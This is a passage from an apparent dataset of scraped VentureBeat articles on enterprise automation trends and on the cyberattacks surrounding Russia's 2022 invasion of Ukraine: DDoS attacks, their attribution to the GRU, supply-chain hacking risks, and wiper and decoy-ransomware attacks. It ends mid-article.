Monitor section with two new real-time views. On top of viewing execution history per desktop flow or gateway, the new Desktop flow runs page shows a real-time view of all your desktop automations. Using sorts and filters, you can narrow down the list of runs. There’s also a new Desktop flow queues page available in preview, which is useful when you have several automations that need to run on a machine or cluster at the same time. You can also change the priority at runtime, and if you have administrator privileges for the gateway, force individual desktop flows to the top of the queue to be executed before the high priority flows. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,142
2,021
"Automated workflows gained traction during the pandemic | VentureBeat"
"https://venturebeat.com/2021/08/11/automated-workflows-gained-traction-during-the-pandemic"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Automated workflows gained traction during the pandemic Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. The pandemic has spurred an increase in the use of automation, with a third of enterprises reporting they have employed automated processes in five or more departments during the past year — up from 15% in 2020. That’s according to Workato’s inaugural Work Automation Index , which was released today and drew on nearly 700 mid-sized to large enterprises using Workato’s workflow automation platform. “Enterprise automation experienced a rapid surge in adoption this past year — no surprise, as business leaders closely examined where they could be more efficient in their operations and support remote teams amid a global pandemic,” Workato CIO Carter Busse said in a press release. The Work Automation Index, which looked at enterprises with between $50 million and over $2 billion in revenue from April 2019 to March 2021, found “pronounced” automation expansion in specific lines of business. For example, customer support automation saw the biggest uptick of any department (over 290% year-over-year), with automation of return and refund processing experiencing 476% growth from the pre-pandemic period. During the pandemic, enterprises turned to automation to scale up their operations while freeing customer service reps to handle challenging workloads. According to Canam Research, 78% of contact centers in the U.S. now intend to deploy AI in the next three years. And research from The Harris Poll indicates that 46% of customer interactions are already automated, with the number expected to reach 59% by 2023. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Chatbot usage in particular exploded during the pandemic as organizations looked to bridge gaps in customer service and onboarding. In 2020, the chatbot market was valued at $17.17 billion, and it is projected to reach $102.29 billion by 2026, according to Mordor Intelligence. There was also a 67% increase in chatbot usage between 2018 and 2020. And Gartner predicts that by 2022, 70% of customer interactions will involve emerging technologies such as chatbots — an increase of 15% from 2018. Automation growth Finance automation was another growing priority for enterprises over the past year, Workato found, with the volume of automated processes across the finance sector increasing by 199% — almost threefold. At the same time, data pipeline automation — i.e., automation of pipelines connecting business apps with cloud data warehouses — surged by 152% as companies embraced digital transformation. But recruitment saw the highest automation expansion of any single process at 547%, reflecting the digital shift of employee hiring, onboarding, and offboarding. Security and compliance automation grew by 171%, meanwhile, reflecting the broader industry trend. Known as an autonomous response, defensive AI-powered security automation can interrupt attacks without affecting day-to-day business. According to a recent Darktrace report , 44% of executives are assessing AI-enabled security systems and 38% are deploying autonomous response technology. In a 2019 analysis, Statista reported that around 80% of executives in the telecommunications industry believe their organization wouldn’t be able to respond to cyberattacks without AI. Overall, the Workato report reinforced the notion that the number of industries automation touches is still growing. A Deloitte report predicts the technology will achieve “near-universal adoption” within five years. And Gartner estimates that organizations can lower operational costs 30% by combining automation technologies like robotic process automation (RPA) with redesigned operational processes by 2024. “Automation was a key driver in departments we anticipated, like IT and finance, but also provided increased capabilities in areas we didn’t expect, such as recruitment and customer success,” Busse continued. “From boosting employee productivity to creating better customer experiences, automation freed businesses and teams to focus on the priorities that mattered most at an incredibly uncertain time in the market.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,143
2,022
"Ukraine defense ministry, banks hit by cyberattacks | VentureBeat"
"https://venturebeat.com/2022/02/15/ukraine-defense-ministry-banks-hit-by-cyberattacks"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Ukraine defense ministry, banks hit by cyberattacks Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Ukraine’s Ministry of Defense reported Tuesday that it has suffered a cyberattack, while the Ukrainian government also disclosed that cyberattacks struck two banks in the country. The State Service of Special Communication and Information Protection of Ukraine said in a statement posted online that there was a “powerful” distributed denial-of-service (DDoS) attack Tuesday against “a number of information resources of Ukraine.” The affected targets included the websites of the Ministry of Defense and the Armed Forces of Ukraine, as well as the web services of Privatbank and Oschadbank. The full statement: Starting from the afternoon of February 15, 2022, there is a powerful DDOS attack on a number of information resources of Ukraine. In particular, this caused interruptions in the work of web services of Privatbank and Oschadbank. The websites of the Ministry of Defense and the Armed Forces of Ukraine were also attacked. As of 19:30, the work of banking web resources has been resumed. A working group of experts from the main subjects of the national cybersecurity system is taking all necessary measures to resist and localize the cyberattack. It was not immediately certain that Russia, which has amassed an estimated 130,000 troops near Ukraine, is connected to any of the cyberattacks. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! On the website of ArmyINFORM, the Ministry of Defense of Ukraine’s information agency, a translation of a post today says the ministry experienced a cyberattack that was “probably” a distributed denial-of-service (DDoS) attack. “The official web portal of the Ministry of Defense of Ukraine probably suffered DDoS attacks when an excessive number of requests per second was recorded,” the translation of the post says. Technical work to restore the portal is underway, according to the translation of the post. The Ukrainian Centre for Strategic Communications and Information Security, a wing of the nation’s culture ministry, also confirmed the attack in a statement and said that the attack had shut down access to the defense ministry’s site, according to a Reuters report. The statement did not specify who is being blamed for it, but the Reuters report suggested that the statement could be interpreted as accusing Russia. “It is not ruled out that the aggressor used tactics of little dirty tricks because its aggressive plans are not working out on a large scale,” the Ukrainian information security said in the statement cited by Reuters. Christian Sorensen, former operational planning team lead for the U.S. Cyber Command, told VentureBeat today that these attacks “are ratcheting up attention and pressure.” “It doesn’t sounds like much impact yet,” Sorensen said in an email. “In the coming hours and days, I would anticipate more activities to isolate and disrupt Ukrainian citizens and especially government activities. The purpose at this stage is to increase leverage in negotiations. Next stage will be impactful and continue deterrence for other countries to get involved.” Russia-affiliated threat actors “have certainly leveraged massive DDoS attacks in the past, as we saw in Estonia in 2007” — in attacks that “crippled the Estonian economy,” said Rick Holland, chief information security officer at Digital Shadows, in an email. “But thus far, the DDoS attacks against the Ukrainian defense ministry and financial institutions appear to be harassment similar to the previous DDoS attacks seen in January,” Holland said. “They could be a precursor to a significant attack or a component of a broader campaign to intimidate and confuse Ukraine.” Threat actors that aren’t linked with Russia “could be responsible for the DDoS attacks” against Ukrainian targets today, he noted. “However, as with anything attribution-related, evidence to substantiate this would be required.” Background The Russian build-up near Ukraine includes armored vehicles, ships, and aircraft, according to reports. In mid-January, a day after the failure of diplomatic efforts to halt the Russian troop build-up, more than 70 Ukrainian government websites were targeted with the new “WhisperGate” family of malware. Ukraine blamed Russia for the attacks, which left many of the government’s websites inaccessible or defaced. Cybersecurity experts say that if Russia does plan to invade Ukraine, it would undoubtedly use cyberattacks as a key part of its strategy — just as the country has done in previous military campaigns over the past decade-and-a-half, including in Georgia and the Crimean Peninsula in Ukraine. “In these previous conflicts, cyber was used to facilitate a Russian occupation that remains today in previously sovereign territory of another country,” said Sorensen, who is now founder and CEO of cybersecurity firm SightGain, in a previous email. “In this way, cyber is tightly integrated into Russian tactics.” If an invasion does occur, “it’s not really a question of whether cyberattacks on Ukraine will take place,” said Mathieu Gorge, author of The Cyber Elephant in the Boardroom and the founder and CEO and of cybersecurity firm VigiTrust. “Bringing down critical infrastructure in Ukraine, or any opponent’s sovereign state infrastructure, is a tactic to either proceed or augment physical attacks,” Gorge said in a previous email. “The idea behind it is that if you cripple the country physically at their border while crippling access to banking, electricity, health services, and IT systems, your attack is much more powerful.” Russia’s strategy will be to generally spread fear, uncertainty, and doubt — both before and during an active/shooting conflict — and to target military personnel and communications during active conflict, Sorensen said. In prior attacks, cyber was used as a diversion — in order to confuse the targets enough to “not put up a big fight or get organized until it was too late,” Sorensen said. Broader cyber conflict? On Friday, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) posted a warning about the potential for attacks against U.S. targets by Russia in connection with the tensions over Ukraine. “While there are not currently any specific credible threats to the U.S. homeland, we are mindful of the potential for the Russian government to consider escalating its destabilizing actions in ways that may impact others outside of Ukraine,” CISA said in its “Shields Up” warning. “CISA recommends all organizations — regardless of size — adopt a heightened posture when it comes to cybersecurity and protecting their most critical assets.” Meanwhile, Russian cyberattacks against western targets have reportedly already taken place in connection with the Ukraine tensions. Last month, a Russia-linked hacker group is believed to have launched a cyberattack against a western government organization in Ukraine, according to researchers at Palo Alto Networks’ Unit 42. The attack involved a “targeted phishing attempt” and attempted delivery of malware, Unit 42 reported. The leadership of the group, which Unit 42 has referred to as “Gamaredon,” includes five Russian Federal Security Service officers, the Security Service of Ukraine said previously. Unit 42 did not identify or further describe the western government entity that was targeted by Gamaredon. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,144
2,022
"U.S., U.K. say Russia was behind Ukraine DDoS attacks | VentureBeat"
"https://venturebeat.com/2022/02/18/u-s-u-k-say-russia-was-behind-ukraine-ddos-attacks"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages U.S., U.K. say Russia was behind Ukraine DDoS attacks Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. The administration of U.S. President Joe Biden and a U.K. government agency today attributed this week’s distributed denial-of-service (DDoS) attacks in Ukraine to Russia, as tensions escalated in the region. The DDoS attacks against military and financial institutions in Ukraine on Tuesday were the “ largest ” in the country’s history, according to the Ukrainian government. The attacks affected targets including the websites of the Ministry of Defense and the Armed Forces of Ukraine, as well as the web services of Privatbank, Oschadbank, and Monobank. On Wednesday, the Security Service of Ukraine (SSU) said preliminary information suggested that in the DDoS attacks, “Russian special services may be involved.” ‘Russia was responsible’ Today, the U.S. deputy national security adviser for cyber and emerging technology, Anne Neuberger, said at the White House that intelligence suggests that Russia’s intelligence directorate, known as GRU, was behind the attacks. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! “We have assessed that Russia was responsible for the DDoS attacks that occurred earlier this week,” Neuberger said, according to a report in The Hill. Meanwhile, in the U.K., the Foreign, Commonwealth and Development Office reported that based on a technical analysis, the GRU is believed to have been involved in the DDoS attacks against targets in Ukraine this week. “The Government today attributed the distributed denial of service (DDoS) attacks against the Ukrainian banking sector on 15 and 16 February 2022 to have involved the Russian Main Intelligence Directorate (GRU),” the agency said in a post. A spokesperson for the Kremlin denied Russian involvement in the DDoS attacks earlier this week. Cyber warfare tactics? DDoS attacks typically attempt to bring down websites or networks by overwhelming servers with traffic. Concerning the attacks, this week, the main purpose was “to sow panic among Ukrainians and destabilize the situation in the country,” a Ukrainian government agency said in a statement earlier this week. “In fact, it was a large-scale stress test that Ukraine withstood.” The attacks began with “fake texts sent en masse about disruptions in the functioning of banks,” the Centre for Strategic Communication, a non-governmental organization in Ukraine, said in a post. Because of the texts, “Ukrainians rushed to check bank applications or withdraw money at ATMs,” the organization said in the post. “This effectively increased the power of the attack, creating an additional load on the systems. Which, in turn, helped the aggressor implement its plans.” Cybersecurity experts say that if Russia does plan to invade Ukraine, it would undoubtedly use cyberattacks as a key part of its strategy — just as the country has done in previous military campaigns over the past decade-and-a-half, including in Georgia and the Crimean Peninsula in Ukraine. In January, Ukraine blamed Russia for attacks that left dozens of the government’s websites inaccessible or defaced. Experts have also said that cyberattacks could be carried out against targets in western countries, including the U.S. in connection with the Ukraine situation. On Tuesday, Biden said that “if Russia attacks the United States or allies through asymmetric means, like disruptive cyberattacks against our companies or critical infrastructure, we are prepared to respond.” Tensions escalate The attribution of this week’s Ukraine DDoS attacks to Russia came as the tensions around the Ukraine crisis continued to rise on Friday, with the U.S. saying that Russia has now amassed 190,000 troops near the borders of Ukraine — up from 100,000 in late January. On Friday, Russian-backed leaders in eastern Ukraine issued orders for residents to evacuate to Russia, and Ukraine said that Russia has attempted to stage a crisis in eastern Ukraine as grounds for an invasion. “We categorically refute Russian disinformation reports on Ukraine’s alleged offensive operations or acts of sabotage in chemical production facilities,” said Dmytro Kuleba, minister of foreign affairs of Ukraine, on Twitter. In remarks Friday at the White House, Biden said he’s “convinced” that Russian President Vladimir Putin has made the decision to invade Ukraine, citing U.S. intelligence. “As of this moment, I’m convinced he’s made the decision,” Biden said. VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,145
2,022
"Russia may use SolarWinds-like hacks in cyberwar over Ukraine | VentureBeat"
"https://venturebeat.com/2022/02/27/russia-may-use-solarwinds-like-hacks-in-cyberwar-over-ukraine"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Russia may use SolarWinds-like hacks in cyberwar over Ukraine Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Stiff sanctions against Russia and Vladimir Putin over Ukraine means a wave of cyberattacks may be headed for the U.S. and other western nations as retaliation, cyber experts say, as part of what could become an escalating “cyberwar.” Security teams, of course, are perpetually on guard for Russian attacks — but the threat this time could be especially difficult to see coming, experts told VentureBeat. That’s because Russia is believed to have been saving up some of its best options for a moment like this one. Russian threat actors are widely believed to have gained footholds into corporate and government systems — via SolarWinds-like software supply chain breaches, the Log4j vulnerability, or even the SolarWinds hack itself — which just haven’t come to light yet. But they might soon. Cyber experts are warning of an increased risk of cyberattacks from Russia, following sanctions that booted major Russian banks from the SWIFT financial system. The move essentially prevents the Russian banks from carrying out international transactions, and followed other rounds of sanctions over Russia’s invasion of Ukraine, including some that’ve hit Putin himself. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Breaching supply chains The SWIFT sanctions had previously been described as the “nuclear option,” and are exactly the sort of thing that Putin had vowed to retaliate against. And cyberattacks are his preferred method for hitting back against the west. In assessing the size and scope of Russia’s military campaign in Ukraine, “this attack has been in the planning for years,” said Eric Byres, CTO of cyber firm aDolus Technology. “Efforts to prepare their cyber campaign will have matched the efforts on the ground, so you know that Russia will have cyberattack resources that match their military ones.” Russian threat actors — whether in government agencies such as the GRU and SVR, or in sympathetic groups such as Conti — have almost certainly compromised software supply chains that we don’t know about yet, according to cyber experts. And in any cyberwar maneuvers targeting the west, they might opt to utilize this access. “I’m willing to bet that the Russians haven’t used even a fraction of the bullets in their cyber arsenal,” Byres said in an email. SolarWinds Uncovered in December 2020, the attack on SolarWinds and customers of its Orion network monitoring platform has been linked to the Russian intelligence agency SVR. The attackers managed to breach the software supply chain and insert malicious code into the application, which was then distributed as an update to thousands of customers. As a result, the attackers are believed to have gained access for as much as nine months to numerous companies and government agencies, including FireEye, Microsoft and the Departments of Defense, State and Treasury. Notably, however, SolarWinds was not the first major software supply chain attack attributed to Russia, or even the most damaging. The 2017 NotPetya attack is believed to have originated through a compromise of an accounting application, MeDoc, which was made by a Ukrainian company and widely used in the country. The malware delivered through updating to the compromised software ended up spreading worldwide. And it remains the costliest cyberattack to date, with damages of $10 billion. Other high-profile supply chain breaches have included Kaseya and CodeCov — and according to data from Aqua Security, software supply chain attacks surged by more than 300% overall in 2021. Unknown breaches Russian threat actors have likely carried out many such breaches that remain unknown, for now. “Supply chain penetrations don’t show up on satellite photos like tanks do, so we don’t really know where the Russian cyber implants are lurking,” Byres said. In the wake of Russia’s unprovoked attack on Ukraine, the country has most likely been holding off on using its attack capability in the U.S. to see how hard the west would hit back with sanctions and support for Ukraine, Byres said. Researchers at Cisco Talos have similarly been warning about the heightened risk of Russian attacks originating in the software supply chain in connection with Russia’s aggressions in Ukraine. “We assess that these actors would likely abuse elements of complex systems to achieve their objectives on targeted environments,” Talos researchers wrote in a blog post. “Past examples of this include the use of Ukrainian tax software to distribute NotPetya malware in 2017 and, more recently, the abuse of SolarWinds to gain access to high-priority targets.” In all likelihood, the Russian threat actors behind the SolarWinds attack still have access from the breach in many companies that has so far gone unused, experts say. Privileged access The SolarWinds attack was “unique in that the threat actor targeted and gained persistent, invasive access to select organizations’ enterprise networks, their federated identity solutions, and their Active Directory and Microsoft 365 environments,” said James Turgal, a former 22-year veteran of the FBI, and now a vice president at cybersecurity consulting firm Optiv. “The actor used that privileged access to collect and exfiltrate sensitive data and created backdoors to enable their return.” Turgal, whose time at the FBI included serving as executive assistant director for the Information and Technology Branch, said the risk is from the threat actor’s “deep penetration into the compromised networks.” “Unless each and every server, drive or compromised device was replaced or re-baselined, the probability of complete eviction of the malicious code would be low, due to the high cost and complexity of such a remediation,” he said. “Absent complete replacement or re-baseline remediation actions, those victims’ enterprise networks and cloud environments will be exposed to substantial risk for repeat and long-term undetected Russian threat actor activity, and those compromised organizations could be re-victimized when the threat actor desires to do so.” Ultimately — with SolarWinds, and even NotPetya — “there may be victims that have been compromised by those attacks, and they just don’t know it yet,” Turgal said. Byres agreed, saying he’s “certain” Russia has access to victims of the SolarWinds campaign that we aren’t aware of yet. “Back in February 2021, I listened to a briefing by a G7 security agency where the director commented that critical infrastructure companies were still reporting to the agency that they had just discovered compromised SolarWinds software in their systems. This was three months after the malware was uncovered,” Byres said. “Three months is a lifetime in the cyber world and the Russians would have had more than enough time to hide deep inside a system and cover their tracks.” Today, Reuters reported that U.S. banks are making preparations for potential cyberattacks in retaliation for sanctions on Russia such as SWIFT. The report specifically mentions that for banks, the SolarWinds breach “is top of mind.” And SolarWinds is “just one campaign that we know about,” Byres said. Log4j For instance, the Apache Log4j vulnerability uncovered in December “was a Christmas gift to the Russians,” he said. “The vulnerable software is widespread, and the exploit was easy and powerful.” Russian agencies almost certainly used the vulnerability, which is believed to have appeared in logging software used by practically every company, to gain footholds into critical systems in the U.S. that they haven’t leveraged yet, Byres said. (Researchers have noted that major attacks utilizing Log4j have been lower than expected so far.) In the current threat situation overall, Western companies that have commercial connections to Ukraine are at an especially high risk, according to Byres. For instance, Maersk reported it lost as much as $300 million in the NotPetya attack. While the shipping firm is based in Denmark, it reportedly used the MeDoc accounting software — “which implied they had business dealings with Ukraine, a fact that was unpopular in Moscow,” Byres said. And notably, while NotPetya did coincide with a Russia-backed separatist movement in Ukraine, “there wasn’t a full-blown war occurring,” he said. “So anyone in the west dealing with Ukrainian businesses today is facing a much bigger risk than Maersk did in 2017.” Fighting fires That being said, Russia will likely be looking to bring cyberwarfare against companies that don’t directly deal with Ukraine as well, Byres said. Putin has made it clear that the entire western world is his enemy and all options are on the table, he said. “Any country and its infrastructure is fair game for a cyberattack” if Putin perceives it is interfering with his goals, Byres said. If the Russians had managed to subdue all of Ukraine in just a few days, they probably would’ve kept cyber weapons in the U.S. infrastructure under wraps for a rainy day in the future, he noted. But after the sanctions of recent days and stiffer resistance from Ukraine’s forces than expected, that calculus may have changed. For cyber defenders in the west, “our job is to uncover these attacks quickly and put them out before they spread and do serious damage,” Byres said. “It is a lot like fighting forest fires – the effective response is to spot little fires quickly and extinguish them before they become big fires.” That can only happen when you have visibility of “both the overall forest and the trees within that forest,” he said. “Governments and company management need to be able to see the forest and the trees in our software supply chain.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,146
2,022
"Ukraine border control hit with wiper cyberattack, slowing refugee crossing | VentureBeat"
"https://venturebeat.com/2022/02/27/ukraine-border-control-hit-with-wiper-cyberattack-slowing-refugee-crossing"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Ukraine border control hit with wiper cyberattack, slowing refugee crossing Share on Facebook Share on X Share on LinkedIn People were walking past cars waiting to cross from Ukraine into Romania, on February 25, 2022. Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. A Ukraine border control station has been struck with a data wiper cyberattack that has slowed the process of allowing refugees to cross into Romania, a cybersecurity expert who spoke with Ukrainian agents at the border crossing told VentureBeat. Refugees fleeing Ukraine after Russia’s invasion of the country have faced long waits at the border, sometimes for as long as days. At least part of the reason appears to be the impact of another major wiper attack, according to the cybersecurity expert, Chris Kubecka, who spoke with VentureBeat on Sunday. “People are stuck because Ukraine cannot process anything except on pencil and paper,” said Kubecka, who was able to cross into Romania on Saturday on a bus with about two dozen people fleeing Ukraine. The wiper attack at a Ukraine border control station was first reported by the Washington Post. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Kubecka said she believes the wiper attack occurred early on Saturday morning, shortly after 6 a.m. Ukraine time. She says she inquired into the reason for the long delays, and found out that a cyberattack had occurred. Given her background in cybersecurity, she was able to speak with Ukrainian agents at the border station about what had happened. They told her that it “seems to be the same exact wiper virus that had hit some of the ministries,” Kubecka said. Last Wednesday, data-wiping malware was deployed against the Ukrainian defense ministry as well as financial, aviation and IT services companies in Ukraine just ahead of Russia’s invasion of the country. The wiper has been referred to as “HermeticWiper” by researchers. The wiper attack that hit the border crossing on Saturday affected the Ukraine-Romania border crossing at Siret, said Kubecka, who documented her journey in a series of tweets. The destructive cyberattack appears to have only impacted the Ukrainian border control, and not the Romanian station, she said. It was not clear if the border crossing has been able to get its computer systems back online. VentureBeat has reached out to the State Border Guard Service of Ukraine and the Security Service of Ukraine. More than 368,000 people have fled Ukraine since Russia’s unprovoked invasion of the country last Thursday, according to the United Nations. Ukraine has needed to closely verify those leaving the country because of the requirement that males ages 18 to 60 remain in Ukraine. However, at least at the Siret border crossing, that was proving to be a major challenge on Saturday, Kubecka said. “‘We got hit with the wiper virus, we can’t process anything,'” she was told by the authorities at the crossing. Kubecka said she is trying to obtain a sample of the wiper malware to give it to parties such as the European Union and CERT-EU (the Computer Emergency Response Team for the EU). “I’m still waiting for arrangements to be made to hand carry it from the border, if I can,” she said. Kubecka, a U.S. native and Air Force veteran now residing in The Netherlands, was in Ukraine because of her background and expertise in the area of cyberwarfare. Her resume has included helping to restore systems for Saudi Aramco after a massive cyberattack in 2012, and she is now the founder and CEO of cyber consulting firm HypaSec. Kubecka says she spent about 28 hours waiting to cross into Romania before being allowed through. “We slept in the bus,” she said. While some in academia may be saying that “‘ cyberwar has not happened yet — it’s only a cyber crisis,’ that’s BS. It’s happening right now,” Kubecka said. “They’re halting and slowing down the evacuation of so many people.” VentureBeat's mission is to be a digital town square for technical decision-makers to gain knowledge about transformative enterprise technology and transact. Discover our Briefings. The AI Impact Tour Join us for an evening full of networking and insights at VentureBeat's AI Impact Tour, coming to San Francisco, New York, and Los Angeles! VentureBeat Homepage Follow us on Facebook Follow us on X Follow us on LinkedIn Follow us on RSS Press Releases Contact Us Advertise Share a News Tip Contribute to DataDecisionMakers Careers Privacy Policy Terms of Service Do Not Sell My Personal Information © 2023 VentureBeat. All rights reserved. "
15,147
2,022
"Ransomware used as a 'decoy or distraction' in Ukraine attacks, researchers say | VentureBeat"
"https://venturebeat.com/2022/02/24/ransomware-used-as-a-decoy-or-distraction-in-ukraine-attacks-researchers-say"
"Artificial Intelligence View All AI, ML and Deep Learning Auto ML Data Labelling Synthetic Data Conversational AI NLP Text-to-Speech Security View All Data Security and Privacy Network Security and Privacy Software Security Computer Hardware Security Cloud and Data Storage Security Data Infrastructure View All Data Science Data Management Data Storage and Cloud Big Data and Analytics Data Networks Automation View All Industrial Automation Business Process Automation Development Automation Robotic Process Automation Test Automation Enterprise Analytics View All Business Intelligence Disaster Recovery Business Continuity Statistical Analysis Predictive Analysis More Data Decision Makers Virtual Communication Team Collaboration UCaaS Virtual Reality Collaboration Virtual Employee Experience Programming & Development Product Development Application Development Test Management Development Languages Ransomware used as a ‘decoy or distraction’ in Ukraine attacks, researchers say Share on Facebook Share on X Share on LinkedIn Are you ready to bring more awareness to your brand? Consider becoming a sponsor for The AI Impact Tour. Learn more about the opportunities here. Cyberattackers deployed ransomware in several instances to serve as a “decoy or distraction” as they targeted organizations in Ukraine with disk-wiping malware on Wednesday, just before Russia’s invasion of the country, researchers at Symantec said. The data wiper has been dubbed HermeticWiper by a researcher at SentinelOne, since its digital certificate had been issued under the name Hermetica Digital Ltd. Researchers at Symantec and ESET first disclosed details on the data wiper on Wednesday. ESET reported that the wiper was installed on hundreds of machines in Ukraine, and followed distributed denial-of-service (DDoS) attacks targeting Ukrainian websites earlier in the day. Symantec’s researchers reported they’ve also discovered evidence that the wiper attacks affected machines in Lithuania and Latvia. VB Event The AI Impact Tour Connect with the enterprise AI community at VentureBeat’s AI Impact Tour coming to a city near you! Decoy for destructive malware In the attacks Wednesday, Symantec researchers said that the destructive malware was deployed against defense organizations as well as financial, aviation and IT services companies. And ransomware was a component of the attacks in some cases. “In several attacks Symantec has investigated to date, ransomware was also deployed against affected organizations at the same time as the wiper,” Symantec researchers said in a blog post. “As with the wiper, scheduled tasks were used to deploy the ransomware,” the researchers said. “File names used by the ransomware included client.exe, cdir.exe, cname.exe, connh.exe, and intpub.exe.” Notably, “it appears likely that the ransomware was used as a decoy or distraction from the wiper attacks,” the Symantec researchers said, posting an image of a presumably fake ransom note used with the ransomware. This approach “has some similarities to the earlier WhisperGate wiper attacks against Ukraine, where the wiper was disguised as ransomware,” the researchers said, referring to the January attacks that left dozens of the Ukrainian government’s websites inaccessible or defaced. Cyber escalation As for HermeticWiper, Juan Andres Guerrero-Saade, the researcher at 